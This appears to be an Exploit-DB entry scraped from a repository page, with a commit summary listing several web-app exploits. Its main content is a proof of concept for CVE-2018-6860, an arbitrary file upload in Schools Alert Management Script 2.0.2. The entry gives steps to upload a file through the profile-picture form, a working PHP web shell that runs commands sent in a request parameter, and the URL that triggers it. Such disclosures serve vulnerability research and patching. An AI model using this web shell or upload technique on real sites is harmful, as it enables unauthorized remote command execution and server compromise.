8d28b02dc1
9 changes to exploits/shellcodes JBoss 4.2.x/4.3.x - Information Disclosure Naukri Clone Script 3.0.3 - 'indus' SQL Injection Facebook Clone Script 1.0.5 - Cross-Site Scripting Schools Alert Management Script 2.0.2 - Arbitrary File Upload Lawyer Search Script 1.0.2 - Cross-Site Scripting Bitcoin MLM Software 1.0.2 - Cross-Site Scripting Select Your College Script 2.0.2 - Authentication Bypass Multi religion Responsive Matrimonial 4.7.2 - Cross-Site Scripting Multi Language Olx Clone Script - Cross-Site Scripting
22 lines
No EOL
1 KiB
Text
22 lines
No EOL
1 KiB
Text
#################################################################################################################
|
|
# Exploit Title: Schools Alert Management Script - 2.0.2 - Arbitrary File Upload / Remote Code Execution
|
|
# Date: 07.02.2018
|
|
# Vendor Homepage: https://www.phpscriptsmall.com/
|
|
# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
|
|
# Category: Web Application
|
|
# Exploit Author: Prasenjit Kanti Paul
|
|
# Web: http://hack2rule.wordpress.com/
|
|
# Version: 2.0.2
|
|
# Tested on: Linux Mint
|
|
# CVE: CVE-2018-6860
|
|
##################################################################################################################
|
|
|
|
Proof of Concept
|
|
=================
|
|
1. Login as Student/Parent
|
|
2. Go to "Edit Profile" to upload profile picture.
|
|
3. Once you find upload section, upload following code as a PHP file:
|
|
<?php
|
|
if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }
|
|
?>
|
|
4. Try to access given PHP file : [site.com]/malicious.php?cmd=ls |